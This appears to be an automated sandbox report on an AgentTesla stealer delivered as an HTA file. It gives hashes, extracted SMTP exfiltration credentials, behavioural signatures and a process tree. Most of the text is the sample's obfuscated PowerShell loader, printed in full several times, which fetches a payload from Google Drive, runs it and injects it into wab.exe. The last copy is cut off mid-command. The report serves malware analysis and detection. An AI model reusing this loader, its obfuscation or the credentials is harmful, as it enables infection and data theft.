agenttesla | d8eb8afa9dea77c71c1f7ea351338eb6025cac939b9cf090d9c17b2fa515f1b6

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
09/05/2024, 07:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Summary_MD5_8F4DDC090B677BEFE549D5B0CBB85ED8_Content-8F4DDC090B677BEFE549D5B0CBB85ED8.hta
Size

27KB
MD5

8f4ddc090b677befe549d5b0cbb85ed8
SHA1

a052f5734500d1021574d375b135b4b79e7a6f64
SHA256

d8eb8afa9dea77c71c1f7ea351338eb6025cac939b9cf090d9c17b2fa515f1b6
SHA512

ce70c15760f9e25db1e8fcbe948bdf45e5b588f0b84bfb19245eed5057dfb594b21246300de448a1b652b20a07747ae30bc7defc92ad070a6257b3eaea27ec29
SSDEEP

384:4wVQoo7G2gVQHzreXU7UEEBUKqhbzaJOOKIUUnzVW5Nn6VKK2:4Foo7PgVQHzxESKqhbWkBUnzY5NhK2

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.cash4cars.nz
Port:
587
Username:
[email protected]
Password:
logs2024!
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	3428	powershell.exe
20	3428	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
16	drive.google.com
41	drive.google.com
69	drive.google.com
15	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	api.ipify.org
75	api.ipify.org
46	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4576	wab.exe
3600	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4500	powershell.exe
4576	wab.exe
4428	powershell.exe
3600	wab.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4500 set thread context of 4576	4500	powershell.exe	101
PID 4428 set thread context of 3600	4428	powershell.exe	117

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
3428	powershell.exe
3428	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
4576	wab.exe
4576	wab.exe
4428	powershell.exe
4428	powershell.exe
4428	powershell.exe
4428	powershell.exe
3600	wab.exe
3600	wab.exe
3600	wab.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4500	powershell.exe
4428	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3428	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4576	wab.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	3600	wab.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4556 wrote to memory of 3428	4556	mshta.exe	83
PID 4556 wrote to memory of 3428	4556	mshta.exe	83
PID 4556 wrote to memory of 3428	4556	mshta.exe	83
PID 3428 wrote to memory of 1524	3428	powershell.exe	89
PID 3428 wrote to memory of 1524	3428	powershell.exe	89
PID 3428 wrote to memory of 1524	3428	powershell.exe	89
PID 3428 wrote to memory of 4500	3428	powershell.exe	97
PID 3428 wrote to memory of 4500	3428	powershell.exe	97
PID 3428 wrote to memory of 4500	3428	powershell.exe	97
PID 4500 wrote to memory of 4956	4500	powershell.exe	99
PID 4500 wrote to memory of 4956	4500	powershell.exe	99
PID 4500 wrote to memory of 4956	4500	powershell.exe	99
PID 4500 wrote to memory of 4576	4500	powershell.exe	101
PID 4500 wrote to memory of 4576	4500	powershell.exe	101
PID 4500 wrote to memory of 4576	4500	powershell.exe	101
PID 4500 wrote to memory of 4576	4500	powershell.exe	101
PID 4500 wrote to memory of 4576	4500	powershell.exe	101
PID 1148 wrote to memory of 4428	1148	mshta.exe	114
PID 1148 wrote to memory of 4428	1148	mshta.exe	114
PID 1148 wrote to memory of 4428	1148	mshta.exe	114
PID 4428 wrote to memory of 3936	4428	powershell.exe	116
PID 4428 wrote to memory of 3936	4428	powershell.exe	116
PID 4428 wrote to memory of 3936	4428	powershell.exe	116
PID 4428 wrote to memory of 3600	4428	powershell.exe	117
PID 4428 wrote to memory of 3600	4428	powershell.exe	117
PID 4428 wrote to memory of 3600	4428	powershell.exe	117
PID 4428 wrote to memory of 3600	4428	powershell.exe	117
PID 4428 wrote to memory of 3600	4428	powershell.exe	117

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Summary_MD5_8F4DDC090B677BEFE549D5B0CBB85ED8_Content-8F4DDC090B677BEFE549D5B0CBB85ED8.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Konfiskeringers = 1;$Upaalidelighedernes='Su';$Upaalidelighedernes+='bstrin';$Upaalidelighedernes+='g';Function Lastepallers($Billedkunstens){$Kabinetssekretariater=$Billedkunstens.Length-$Konfiskeringers;For($Parandrus=5;$Parandrus -lt $Kabinetssekretariater;$Parandrus+=6){$Haardkogte+=$Billedkunstens.$Upaalidelighedernes.Invoke( $Parandrus, $Konfiskeringers);}$Haardkogte;}function Tillgsbevillingernes($Suspektes){. ($Rollelistes) ($Suspektes);}$Pointedly=Lastepallers 'gho tMO.dinoFrafrz ndaniIchnolApperllirocaBl.ck/Cacop5Fuffo.Gulvt0 Flle Galat( Co tWE,paviAnnekn bygndSuperoM diswvensts Fire FederNSla,bTBaggr grup1.lleb0Caved.Faveo0Tranl;Orphi AdultWLim,ci PunknHalfd6Overh4Dosme;Luci. B odfxUlste6Browb4Konge;Ddsri HolodrSkat vS emn:Skad 1 shaw2Finge1Pessi.Retsv0sk.tj)Opsam Ve lgGJ urne DebacGastrkobstrooutbu/Kalve2Gra h0Palat1Jordf0Efter0Ascen1senio0 Over1Defen CraunFSu,roiHekserIkraferemedfBolbooMaltlxDragt/Saft.1 rovf2P,nch1 Forh.Dermo0Ducti ';$stikningen=Lastepallers 'birdiUBrys,sT itte CounrPerik-AflbsA GramgInerreUdtonn Centt b.vb ';$Lood=Lastepallers 'T.esyhConfltPseudt StacpGano,s e,pe:Dekod/Kadre/ ubisd VaderRo,heiFllesvOvidaeHaand.St.ckgDe.axotaarnoDrkargDoubllSuggeeSam,e. EnevcUdkanoL,mitm rche/Stensu.fstacModst?For.aeVovsyxB,rchpHerseoI,entrLa,intQ,itt=P,rtidRecklo g,okwTinclnForemlUriceo ReisaLogicdRegis&AnklaiOrdnidSha.t=,hysi1.eibnn Koenw Undeh,abba-Lu inqWheed2LntilUCatasp H.rsrAk.ieE ,embSHoolizPrimaOCelluaHyp.eEEneinU Ag r5 SpitT onpeZ Pl,tyCamoun.nksl5Pa.seTSnubl1.earbCAa,deRMentoPPh toyVesteRSpr.gcSautoj Frs qSp.cr ';$Munist=Lastepallers 'Subp >Trita ';$Rollelistes=Lastepallers 'Ite.eiBesk.e ApotxPineg ';$Crinitory='Kassedamen';Tillgsbevillingernes (Lastepallers 'apl.mS BailebeskutManks- .rucCUdlndo,angen GiratBoerneStrudn S.cct Chee Uds,- RealP ounaSwimmt B ushPrste Fibr TVelvi:Th.ym\Re.obW ,ontiHvernnUdblsdSalicrSjleko Han.wN,ndieU ykkd Back.LatertChoanxUnorntAph.s Undr-U felVGrnsuaD.sselrealku SubveAfslu Ratin$Hu.hoCOve grBreeciTo,menUnderiCresotUdvaloWinber BortyTherm;Banan ');Tillgsbevillingernes (Lastepallers ' ShewiSkurvfCrimi Goofb(Trutht ehave Coe.sNaugetInd,k-BuskopFejlfa .lurt Opgahretab GeninTMonke:Dermi\Film.WForesiDamebnCasewdSubenrRu,tnoOpsamw CriceMha mdDiplo.UncaptSkispxStlant alu)Flute{GloomeVidtlxSv.ini,astntIn.st}Dv.gf;Reckv ');$Noughts = Lastepallers 'BooteenietzcShakehpimgeoVenst Skatt%Engela Slo pKarenpRotondSisbaaMy hotXero.a Fors%Selvu\ResulIHeretnPo tpdutrobsAfforuBeby,gMaloneV.luenDemicdunpoleF rjt.EnterC Lo,no UnduvTorri Uds e&Tea.r&Bevis Sul.gePomaccSuprahTvin.oAnthi opfin$Ossif ';Tillgsbevillingernes (Lastepallers 'Hus y$St.gtgSt.aplBippeoUdsalbA,beja Selel Kano:RumbaCVe,sioGavebtCurtstOvermoJaggenUnpleeScotae H at=.ecul(Boligc Boepm Palmd Cowh Nonor/Jew.lcSalva Ditc$N,nemNFyrstoCalcuuTungegG rmahDecaytra iosMotor) g.si ');Tillgsbevillingernes (Lastepallers 'Be.bn$M,tisgLegerlGazeboOvertbKvindaHermalRaa,s:BiffyCGavfluInverrCr,netStalasP evo=Synd,$ StfrLSkbneoNonaloFrimudBlive.Mi,rosRhythpF,rtklM ntaiSerodtPseud(Tears$LakfeMBrochuMouilnTaaleiVipersP.rrotBorts) Sant ');$Lood=$Curts[0];Tillgsbevillingernes (Lastepallers 'Afste$Nichog.urrelStat.oR,toobUdplua Com,l S,ka:,onreFs.unkii.genrC aseeArgummA,desa,nwaisMine.t Ae.oeel.ctr Bible,adstn elfosInsta=NonarNde.oneBut rw Tung-do,ilOMerudb ForsjChauseUnsorcPerlotVa.dr SupplSCor.ey .okksO.erat Supee StrkmG lse..usikNSkoseeDruertgamen.E,ighWDvefreOvergbSclerC wardlSvaleiLampeeKraftnGemmetE,der ');Tillgsbevillingernes (Lastepallers 'Trip,$CalliFFlaskiHen,irPre.oeGenn mMid.iaLin es forvtDipteeslagvrBeedie Unden efrsTh.mi. .robHOctameCoempaD rpld T ffeJuridrAbsorsLad,n[Bndel$Transs Fol.tC,ntriPara,kCrispnKrigeifascin Leong FaireHighhn Oblo].ueak=North$QuinqPski,loTartyitrivan MilvtHyls,ePlatydBiogrl.ortaycas.w ');$sportsfiskerforbundenes=Lastepallers ' AffaF,sjapiMiddarAnkome F agmSensiaLoders EmbotSprg eFarsqr Afide Vi,nn kartsPorte. MuddDGod,toInconw eetfnRhizolSanito BankaAdenidDisloF Ma.riborrol ignae Conj(Demok$HvorlLNonpeoNondaobecqudHgtn.,.vagh$ MataNP.acooEkvi ngremigG.mmeoCostlsPera pPl.toeMisocl Lace) P.as ';$sportsfiskerforbundenes=$Cottonee[1]+$sportsfiskerforbundenes;$Nongospel=$Cottonee[0];Tillgsbevillingernes (Lastepallers 'Repro$Ty,ergGlde,lDeliboChavabPrivaaElverlDanne:SuasiPRuckll,lavoePr.ktn fribu FrikmChrysd Tilbi Ski.sFamilkSpeleuTops s BooksRhizoiAtopiocholenTeagleParadrslagtnBittieSca,p1For.d8Dom.u5 Hams= Srst(Mono.TPuppeeEkspls HalvtPhoto-HubshPDeuteaR olftTrigghP.evi nunn$,ushoNmim soMillinHemicgL prooMaxifsFjernpbeirae LuftlUlt,a)De.ut ');while (!$Plenumdiskussionerne185) {Tillgsbevillingernes (Lastepallers 'Forre$ TaargHeredlGift.oFragrb.ygmaa hynil.esnr:B engU Vikkn Ov,rrN.chee EnslaBes,isNoncos M rdu SandrDepreiWemlenFas.hgsilic=Pensa$ BazatTry frLimpiu,airyeasyls ') ;Tillgsbevillingernes $sportsfiskerforbundenes;Tillgsbevillingernes (Lastepallers 'Hy osSVirkst,enora,astlr MisvtSeism- PoreSLedgelT,onseClangeCorrip olo Naal4Smidi ');Tillgsbevillingernes (Lastepallers 'U eti$FinlagMinorlTricho everbEgritaFallilOxid,:OscilPKondolArgaieNeur,n My,su,ejfnm FrstdprojeiTroposPent.kBog mu SubssUnders DerviTovtroRetten ,hiteStatsr.indbnEm loeSkatt1Irreg8Frema5B nal=Exits(Fo,geTKoroveLejlisL,quat Hist-Cano,PChetoaRafletpsykohEffra Ma,dr$Je,teN A,groEfternU dergReexpo Kno.sUnsu pAnacreGittel .jre)corre ') ;Tillgsbevillingernes (Lastepallers ' Sjus$GlbbogL,ibnl.llokoVin ebLynbra Tyt lJapon: RestRTithiyAdmirg,aicieKontrk Sepiuu torptracdj FluozSu adeTipurn OharsKage.=Acerv$SigmogTohomlParapopleadbMan,faUgidel St,e:acrosJ,elesa YearmR,ggebAnve,o U,sprA.rhueDepureB,fat+Sulph+ egis%Codli$DelikCBro muRoorbrVarsitFindesTetra.Hampec anco .eseuKompanForfltFakul ') ;$Lood=$Curts[$Rygekupjzens];}$Rigsfyrsten=287903;$Colonized=30553;Tillgsbevillingernes (Lastepallers 'Tr,gt$FletcgDybvalSireno.runjbPhemia EftelGaleg: forrSVith tC.exiyLinjerEngel Hig,a=Kaver S,reaGBunkee DetatFored-Pa,afCDeccaotottenHog otAsconehovednMedictKreer Austr$Pri.oN U vioMvhkinp,ossg discoAetiosIncitpChaneeDrag l Snip ');Tillgsbevillingernes (Lastepallers 'e cen$SplengVandllUn,etoAchyrbOv rcaEfforlP.emo:StyreT ByzoeTalcez He,ic r.ckuSekstcAv.lsa BasanSosi Duble=Unsug lten[YdeevSagteryChunksInexitS luge Modsmparth.CribrCsubmuoPterynFort,vFestkeRadiarTurnptAfp,e]rosin:Sekti:NondyFEs larProwloPlattm.idnaBVagilaUnivesPtol.eSters6Hvidl4FribaSPseu,tModstrEndotiAngelnopposgsper (.elod$unfr SAdornt Voc,yRegimrPreco) Coli ');Tillgsbevillingernes (Lastepallers 'Invol$whu.sgBi lil UnrioironibSnakeapendul ,ost:CountSBassieDriftp fdrt InkaeOmgivmSt.udfCervelV.riauFun,to ForsuAgnetsanmas1Bevg.5Debit3Calcs Sacia=Blods Dikt [PrehaSJetalyEr.ndsTorm tActine RoysmPiben. .angTIndkaeCamphxBisektLil,a. TrugE lillnVir ucSexanoLus,edCe,eri m,innFistegReg.e]Sjlla:hekto:du,seAVandpSCorepCV.ratIAre.dIOpr.n.CatapG decoeErstat enfoS ,taftHall,r .orti,evienCentegGru,d(Fi,dy$ TeleTBermmeChurczBarytcExcisuSciurcEfteraS pplnTavse)Imit ');Tillgsbevillingernes (Lastepallers ' Avas$UbetagRnneblboggsoProetbSvaekaUndvilDa.pd: Uv,lCEquesoserramBainiaJ.mpieFlertrFuldsnBa,dyeRatho=Hanne$BoligS DuffeSportp Se.at T.ldeMetabmtilfifViatil anskuSalloo Syndu NonisUges.1Preen5Skind3Halc .WoodcsFol.euNic,sbMeldesm,nimtVedhfrAfspoiForbnnCar,ogProgr( Tuml$ InduRF.iluiShippgmeditsFidusfUdskyyDaggerHausssCoupetFarleebaandnAsabe,Sul.o$StedkCPreinoRntgelHovedoHerdsn Bagaium.auzP omoeGhostd F rn) ,ndo ');Tillgsbevillingernes $Comaerne;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indsugende.Cov && echo $"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Konfiskeringers = 1;$Upaalidelighedernes='Su';$Upaalidelighedernes+='bstrin';$Upaalidelighedernes+='g';Function Lastepallers($Billedkunstens){$Kabinetssekretariater=$Billedkunstens.Length-$Konfiskeringers;For($Parandrus=5;$Parandrus -lt $Kabinetssekretariater;$Parandrus+=6){$Haardkogte+=$Billedkunstens.$Upaalidelighedernes.Invoke( $Parandrus, $Konfiskeringers);}$Haardkogte;}function Tillgsbevillingernes($Suspektes){. ($Rollelistes) ($Suspektes);}$Pointedly=Lastepallers 'gho tMO.dinoFrafrz ndaniIchnolApperllirocaBl.ck/Cacop5Fuffo.Gulvt0 Flle Galat( Co tWE,paviAnnekn bygndSuperoM diswvensts Fire FederNSla,bTBaggr grup1.lleb0Caved.Faveo0Tranl;Orphi AdultWLim,ci PunknHalfd6Overh4Dosme;Luci. B odfxUlste6Browb4Konge;Ddsri HolodrSkat vS emn:Skad 1 shaw2Finge1Pessi.Retsv0sk.tj)Opsam Ve lgGJ urne DebacGastrkobstrooutbu/Kalve2Gra h0Palat1Jordf0Efter0Ascen1senio0 Over1Defen CraunFSu,roiHekserIkraferemedfBolbooMaltlxDragt/Saft.1 rovf2P,nch1 Forh.Dermo0Ducti ';$stikningen=Lastepallers 'birdiUBrys,sT itte CounrPerik-AflbsA GramgInerreUdtonn Centt b.vb ';$Lood=Lastepallers 'T.esyhConfltPseudt StacpGano,s e,pe:Dekod/Kadre/ ubisd VaderRo,heiFllesvOvidaeHaand.St.ckgDe.axotaarnoDrkargDoubllSuggeeSam,e. EnevcUdkanoL,mitm rche/Stensu.fstacModst?For.aeVovsyxB,rchpHerseoI,entrLa,intQ,itt=P,rtidRecklo g,okwTinclnForemlUriceo ReisaLogicdRegis&AnklaiOrdnidSha.t=,hysi1.eibnn Koenw Undeh,abba-Lu inqWheed2LntilUCatasp H.rsrAk.ieE ,embSHoolizPrimaOCelluaHyp.eEEneinU Ag r5 SpitT onpeZ Pl,tyCamoun.nksl5Pa.seTSnubl1.earbCAa,deRMentoPPh toyVesteRSpr.gcSautoj Frs qSp.cr ';$Munist=Lastepallers 'Subp >Trita ';$Rollelistes=Lastepallers 'Ite.eiBesk.e ApotxPineg ';$Crinitory='Kassedamen';Tillgsbevillingernes (Lastepallers 'apl.mS BailebeskutManks- .rucCUdlndo,angen GiratBoerneStrudn S.cct Chee Uds,- RealP ounaSwimmt B ushPrste Fibr TVelvi:Th.ym\Re.obW ,ontiHvernnUdblsdSalicrSjleko Han.wN,ndieU ykkd Back.LatertChoanxUnorntAph.s Undr-U felVGrnsuaD.sselrealku SubveAfslu Ratin$Hu.hoCOve grBreeciTo,menUnderiCresotUdvaloWinber BortyTherm;Banan ');Tillgsbevillingernes (Lastepallers ' ShewiSkurvfCrimi Goofb(Trutht ehave Coe.sNaugetInd,k-BuskopFejlfa .lurt Opgahretab GeninTMonke:Dermi\Film.WForesiDamebnCasewdSubenrRu,tnoOpsamw CriceMha mdDiplo.UncaptSkispxStlant alu)Flute{GloomeVidtlxSv.ini,astntIn.st}Dv.gf;Reckv ');$Noughts = Lastepallers 'BooteenietzcShakehpimgeoVenst Skatt%Engela Slo pKarenpRotondSisbaaMy hotXero.a Fors%Selvu\ResulIHeretnPo tpdutrobsAfforuBeby,gMaloneV.luenDemicdunpoleF rjt.EnterC Lo,no UnduvTorri Uds e&Tea.r&Bevis Sul.gePomaccSuprahTvin.oAnthi opfin$Ossif ';Tillgsbevillingernes (Lastepallers 'Hus y$St.gtgSt.aplBippeoUdsalbA,beja Selel Kano:RumbaCVe,sioGavebtCurtstOvermoJaggenUnpleeScotae H at=.ecul(Boligc Boepm Palmd Cowh Nonor/Jew.lcSalva Ditc$N,nemNFyrstoCalcuuTungegG rmahDecaytra iosMotor) g.si ');Tillgsbevillingernes (Lastepallers 'Be.bn$M,tisgLegerlGazeboOvertbKvindaHermalRaa,s:BiffyCGavfluInverrCr,netStalasP evo=Synd,$ StfrLSkbneoNonaloFrimudBlive.Mi,rosRhythpF,rtklM ntaiSerodtPseud(Tears$LakfeMBrochuMouilnTaaleiVipersP.rrotBorts) Sant ');$Lood=$Curts[0];Tillgsbevillingernes (Lastepallers 'Afste$Nichog.urrelStat.oR,toobUdplua Com,l S,ka:,onreFs.unkii.genrC aseeArgummA,desa,nwaisMine.t Ae.oeel.ctr Bible,adstn elfosInsta=NonarNde.oneBut rw Tung-do,ilOMerudb ForsjChauseUnsorcPerlotVa.dr SupplSCor.ey .okksO.erat Supee StrkmG lse..usikNSkoseeDruertgamen.E,ighWDvefreOvergbSclerC wardlSvaleiLampeeKraftnGemmetE,der ');Tillgsbevillingernes (Lastepallers 'Trip,$CalliFFlaskiHen,irPre.oeGenn mMid.iaLin es forvtDipteeslagvrBeedie Unden efrsTh.mi. .robHOctameCoempaD rpld T ffeJuridrAbsorsLad,n[Bndel$Transs Fol.tC,ntriPara,kCrispnKrigeifascin Leong FaireHighhn Oblo].ueak=North$QuinqPski,loTartyitrivan MilvtHyls,ePlatydBiogrl.ortaycas.w ');$sportsfiskerforbundenes=Lastepallers ' AffaF,sjapiMiddarAnkome F agmSensiaLoders EmbotSprg eFarsqr Afide Vi,nn kartsPorte. MuddDGod,toInconw eetfnRhizolSanito BankaAdenidDisloF Ma.riborrol ignae Conj(Demok$HvorlLNonpeoNondaobecqudHgtn.,.vagh$ MataNP.acooEkvi ngremigG.mmeoCostlsPera pPl.toeMisocl Lace) P.as ';$sportsfiskerforbundenes=$Cottonee[1]+$sportsfiskerforbundenes;$Nongospel=$Cottonee[0];Tillgsbevillingernes (Lastepallers 'Repro$Ty,ergGlde,lDeliboChavabPrivaaElverlDanne:SuasiPRuckll,lavoePr.ktn fribu FrikmChrysd Tilbi Ski.sFamilkSpeleuTops s BooksRhizoiAtopiocholenTeagleParadrslagtnBittieSca,p1For.d8Dom.u5 Hams= Srst(Mono.TPuppeeEkspls HalvtPhoto-HubshPDeuteaR olftTrigghP.evi nunn$,ushoNmim soMillinHemicgL prooMaxifsFjernpbeirae LuftlUlt,a)De.ut ');while (!$Plenumdiskussionerne185) {Tillgsbevillingernes (Lastepallers 'Forre$ TaargHeredlGift.oFragrb.ygmaa hynil.esnr:B engU Vikkn Ov,rrN.chee EnslaBes,isNoncos M rdu SandrDepreiWemlenFas.hgsilic=Pensa$ BazatTry frLimpiu,airyeasyls ') ;Tillgsbevillingernes $sportsfiskerforbundenes;Tillgsbevillingernes (Lastepallers 'Hy osSVirkst,enora,astlr MisvtSeism- PoreSLedgelT,onseClangeCorrip olo Naal4Smidi ');Tillgsbevillingernes (Lastepallers 'U eti$FinlagMinorlTricho everbEgritaFallilOxid,:OscilPKondolArgaieNeur,n My,su,ejfnm FrstdprojeiTroposPent.kBog mu SubssUnders DerviTovtroRetten ,hiteStatsr.indbnEm loeSkatt1Irreg8Frema5B nal=Exits(Fo,geTKoroveLejlisL,quat Hist-Cano,PChetoaRafletpsykohEffra Ma,dr$Je,teN A,groEfternU dergReexpo Kno.sUnsu pAnacreGittel .jre)corre ') ;Tillgsbevillingernes (Lastepallers ' Sjus$GlbbogL,ibnl.llokoVin ebLynbra Tyt lJapon: RestRTithiyAdmirg,aicieKontrk Sepiuu torptracdj FluozSu adeTipurn OharsKage.=Acerv$SigmogTohomlParapopleadbMan,faUgidel St,e:acrosJ,elesa YearmR,ggebAnve,o U,sprA.rhueDepureB,fat+Sulph+ egis%Codli$DelikCBro muRoorbrVarsitFindesTetra.Hampec anco .eseuKompanForfltFakul ') ;$Lood=$Curts[$Rygekupjzens];}$Rigsfyrsten=287903;$Colonized=30553;Tillgsbevillingernes (Lastepallers 'Tr,gt$FletcgDybvalSireno.runjbPhemia EftelGaleg: forrSVith tC.exiyLinjerEngel Hig,a=Kaver S,reaGBunkee DetatFored-Pa,afCDeccaotottenHog otAsconehovednMedictKreer Austr$Pri.oN U vioMvhkinp,ossg discoAetiosIncitpChaneeDrag l Snip ');Tillgsbevillingernes (Lastepallers 'e cen$SplengVandllUn,etoAchyrbOv rcaEfforlP.emo:StyreT ByzoeTalcez He,ic r.ckuSekstcAv.lsa BasanSosi Duble=Unsug lten[YdeevSagteryChunksInexitS luge Modsmparth.CribrCsubmuoPterynFort,vFestkeRadiarTurnptAfp,e]rosin:Sekti:NondyFEs larProwloPlattm.idnaBVagilaUnivesPtol.eSters6Hvidl4FribaSPseu,tModstrEndotiAngelnopposgsper (.elod$unfr SAdornt Voc,yRegimrPreco) Coli ');Tillgsbevillingernes (Lastepallers 'Invol$whu.sgBi lil UnrioironibSnakeapendul ,ost:CountSBassieDriftp fdrt InkaeOmgivmSt.udfCervelV.riauFun,to ForsuAgnetsanmas1Bevg.5Debit3Calcs Sacia=Blods Dikt [PrehaSJetalyEr.ndsTorm tActine RoysmPiben. .angTIndkaeCamphxBisektLil,a. TrugE lillnVir ucSexanoLus,edCe,eri m,innFistegReg.e]Sjlla:hekto:du,seAVandpSCorepCV.ratIAre.dIOpr.n.CatapG decoeErstat enfoS ,taftHall,r .orti,evienCentegGru,d(Fi,dy$ TeleTBermmeChurczBarytcExcisuSciurcEfteraS pplnTavse)Imit ');Tillgsbevillingernes (Lastepallers ' Avas$UbetagRnneblboggsoProetbSvaekaUndvilDa.pd: Uv,lCEquesoserramBainiaJ.mpieFlertrFuldsnBa,dyeRatho=Hanne$BoligS DuffeSportp Se.at T.ldeMetabmtilfifViatil anskuSalloo Syndu NonisUges.1Preen5Skind3Halc .WoodcsFol.euNic,sbMeldesm,nimtVedhfrAfspoiForbnnCar,ogProgr( Tuml$ InduRF.iluiShippgmeditsFidusfUdskyyDaggerHausssCoupetFarleebaandnAsabe,Sul.o$StedkCPreinoRntgelHovedoHerdsn Bagaium.auzP omoeGhostd F rn) ,ndo ');Tillgsbevillingernes $Comaerne;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indsugende.Cov && echo $"
      4⤵
      PID:4956
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4576

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\373b361a28ab43b8abf97adb4fa78f2b /t 228 /p 4556
1⤵
PID:5052

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4332

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Summary_MD5_8F4DDC090B677BEFE549D5B0CBB85ED8_Content-8F4DDC090B677BEFE549D5B0CBB85ED8.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Konfiskeringers = 1;$Upaalidelighedernes='Su';$Upaalidelighedernes+='bstrin';$Upaalidelighedernes+='g';Function Lastepallers($Billedkunstens){$Kabinetssekretariater=$Billedkunstens.Length-$Konfiskeringers;For($Parandrus=5;$Parandrus -lt $Kabinetssekretariater;$Parandrus+=6){$Haardkogte+=$Billedkunstens.$Upaalidelighedernes.Invoke( $Parandrus, $Konfiskeringers);}$Haardkogte;}function Tillgsbevillingernes($Suspektes){. ($Rollelistes) ($Suspektes);}$Pointedly=Lastepallers 'gho tMO.dinoFrafrz ndaniIchnolApperllirocaBl.ck/Cacop5Fuffo.Gulvt0 Flle Galat( Co tWE,paviAnnekn bygndSuperoM diswvensts Fire FederNSla,bTBaggr grup1.lleb0Caved.Faveo0Tranl;Orphi AdultWLim,ci PunknHalfd6Overh4Dosme;Luci. B odfxUlste6Browb4Konge;Ddsri HolodrSkat vS emn:Skad 1 shaw2Finge1Pessi.Retsv0sk.tj)Opsam Ve lgGJ urne DebacGastrkobstrooutbu/Kalve2Gra h0Palat1Jordf0Efter0Ascen1senio0 Over1Defen CraunFSu,roiHekserIkraferemedfBolbooMaltlxDragt/Saft.1 rovf2P,nch1 Forh.Dermo0Ducti ';$stikningen=Lastepallers 'birdiUBrys,sT itte CounrPerik-AflbsA GramgInerreUdtonn Centt b.vb ';$Lood=Lastepallers 'T.esyhConfltPseudt StacpGano,s e,pe:Dekod/Kadre/ ubisd VaderRo,heiFllesvOvidaeHaand.St.ckgDe.axotaarnoDrkargDoubllSuggeeSam,e. EnevcUdkanoL,mitm rche/Stensu.fstacModst?For.aeVovsyxB,rchpHerseoI,entrLa,intQ,itt=P,rtidRecklo g,okwTinclnForemlUriceo ReisaLogicdRegis&AnklaiOrdnidSha.t=,hysi1.eibnn Koenw Undeh,abba-Lu inqWheed2LntilUCatasp H.rsrAk.ieE ,embSHoolizPrimaOCelluaHyp.eEEneinU Ag r5 SpitT onpeZ Pl,tyCamoun.nksl5Pa.seTSnubl1.earbCAa,deRMentoPPh toyVesteRSpr.gcSautoj Frs qSp.cr 